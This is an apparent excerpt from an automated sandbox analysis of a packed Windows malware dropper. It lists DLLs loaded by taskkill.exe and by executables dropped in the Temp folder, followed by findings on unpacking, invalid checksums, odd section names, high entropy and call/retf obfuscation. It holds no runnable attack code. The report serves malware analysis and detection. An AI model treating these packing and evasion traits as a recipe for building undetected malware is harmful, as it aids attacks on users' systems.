Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1920512 > 1048576
Source: file.exe Static PE information: Raw size of mtubkuce is bigger than: 0x100000 < 0x1a3000

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.650000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtubkuce:EW;fjbqbvbv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtubkuce:EW;fjbqbvbv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.b40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtubkuce:EW;fjbqbvbv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtubkuce:EW;fjbqbvbv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.b40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtubkuce:EW;fjbqbvbv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtubkuce:EW;fjbqbvbv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Unpacked PE file: 10.2.86526d7b20.exe.f30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldvhpekm:EW;pcoxsocv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldvhpekm:EW;pcoxsocv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Unpacked PE file: 31.2.d0d78d3fdb.exe.f30000.0.unpack :EW;.rsrc:W;.idata :W;sazuwdld:EW;giqmsvmy:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Unpacked PE file: 32.2.86526d7b20.exe.f30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldvhpekm:EW;pcoxsocv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldvhpekm:EW;pcoxsocv:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: 86526d7b20.exe.6.dr Static PE information: real checksum: 0x1caac0 should be: 0x1c7986
Source: random[1].exe.6.dr Static PE information: real checksum: 0x43ac19 should be: 0x43e553
Source: random[1].exe1.6.dr Static PE information: real checksum: 0x1caac0 should be: 0x1c7986
Source: d0d78d3fdb.exe.6.dr Static PE information: real checksum: 0x29c596 should be: 0x2a8ce9
Source: 2a8b7e5b78.exe.6.dr Static PE information: real checksum: 0x43ac19 should be: 0x43e553
Source: file.exe Static PE information: real checksum: 0x1d7579 should be: 0x1df2fc
Source: 2235d4f703.exe.6.dr Static PE information: real checksum: 0x1d61ec should be: 0x1d2d70
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1d7579 should be: 0x1df2fc
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1d61ec should be: 0x1d2d70
Source: random[2].exe.6.dr Static PE information: real checksum: 0x29c596 should be: 0x2a8ce9
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: mtubkuce
Source: file.exe Static PE information: section name: fjbqbvbv
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: mtubkuce
Source: skotes.exe.0.dr Static PE information: section name: fjbqbvbv
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name: sazuwdld
Source: random[2].exe.6.dr Static PE information: section name: giqmsvmy
Source: random[2].exe.6.dr Static PE information: section name: .taggant
Source: d0d78d3fdb.exe.6.dr Static PE information: section name:
Source: d0d78d3fdb.exe.6.dr Static PE information: section name: .idata
Source: d0d78d3fdb.exe.6.dr Static PE information: section name: sazuwdld
Source: d0d78d3fdb.exe.6.dr Static PE information: section name: giqmsvmy
Source: d0d78d3fdb.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: pablyzls
Source: random[1].exe.6.dr Static PE information: section name: ldihguet
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: 2a8b7e5b78.exe.6.dr Static PE information: section name:
Source: 2a8b7e5b78.exe.6.dr Static PE information: section name: .rsrc
Source: 2a8b7e5b78.exe.6.dr Static PE information: section name: .idata
Source: 2a8b7e5b78.exe.6.dr Static PE information: section name:
Source: 2a8b7e5b78.exe.6.dr Static PE information: section name: pablyzls
Source: 2a8b7e5b78.exe.6.dr Static PE information: section name: ldihguet
Source: 2a8b7e5b78.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: tbzxaang
Source: random[1].exe0.6.dr Static PE information: section name: djfutenp
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 2235d4f703.exe.6.dr Static PE information: section name:
Source: 2235d4f703.exe.6.dr Static PE information: section name: .idata
Source: 2235d4f703.exe.6.dr Static PE information: section name:
Source: 2235d4f703.exe.6.dr Static PE information: section name: tbzxaang
Source: 2235d4f703.exe.6.dr Static PE information: section name: djfutenp
Source: 2235d4f703.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: ldvhpekm
Source: random[1].exe1.6.dr Static PE information: section name: pcoxsocv
Source: random[1].exe1.6.dr Static PE information: section name: .taggant
Source: 86526d7b20.exe.6.dr Static PE information: section name:
Source: 86526d7b20.exe.6.dr Static PE information: section name: .idata
Source: 86526d7b20.exe.6.dr Static PE information: section name:
Source: 86526d7b20.exe.6.dr Static PE information: section name: ldvhpekm
Source: 86526d7b20.exe.6.dr Static PE information: section name: pcoxsocv
Source: 86526d7b20.exe.6.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_05864D1A push ecx; retf 9_3_05864D40
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_05864D1A push ecx; retf 9_3_05864D40
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_05864D1A push ecx; retf 9_3_05864D40
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_05864D1A push ecx; retf 9_3_05864D40
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Code function: 9_3_012429FF push eax; retf 9_3_01242A11
Source: file.exe Static PE information: section name: entropy: 7.985923989746153
Source: file.exe Static PE information: section name: mtubkuce entropy: 7.953925168272313
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.985923989746153
Source: skotes.exe.0.dr Static PE information: section name: mtubkuce entropy: 7.953925168272313
Source: random[2].exe.6.dr Static PE information: section name: entropy: 7.771927560499484
Source: d0d78d3fdb.exe.6.dr Static PE information: section name: entropy: 7.771927560499484
Source: random[1].exe.6.dr Static PE information: section name: pablyzls entropy: 7.955349533688959
Source: 2a8b7e5b78.exe.6.dr Static PE information: section name: pablyzls entropy: 7.955349533688959
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.983845632478501
Source: random[1].exe0.6.dr Static PE information: section name: tbzxaang entropy: 7.954161399988786
Source: 2235d4f703.exe.6.dr Static PE information: section name: entropy: 7.983845632478501
Source: 2235d4f703.exe.6.dr Static PE information: section name: tbzxaang entropy: 7.954161399988786
Source: random[1].exe1.6.dr Static PE information: section name: ldvhpekm entropy: 7.955852515970652
